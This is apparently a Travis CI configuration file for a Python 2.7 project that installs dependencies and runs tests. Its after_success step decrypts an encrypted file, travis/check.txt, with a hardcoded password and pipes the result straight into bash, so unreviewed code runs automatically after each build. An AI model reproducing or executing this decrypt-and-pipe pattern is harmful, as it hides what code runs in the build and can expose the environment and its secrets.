language: python
python:
  - "2.7"
# command to install all dependencies
install: "pip install -r requirements.txt"
# command to run tests
script: python test.py
notifications:
  email: false
before_install:
 - python -V
 - pip -V
 - sudo pip install -r travis/requirements.txt
 - python ./travis/try_issues.py
after_success:
- openssl aes-256-cbc -a -d -pass pass:travis -in travis/check.txt | bash
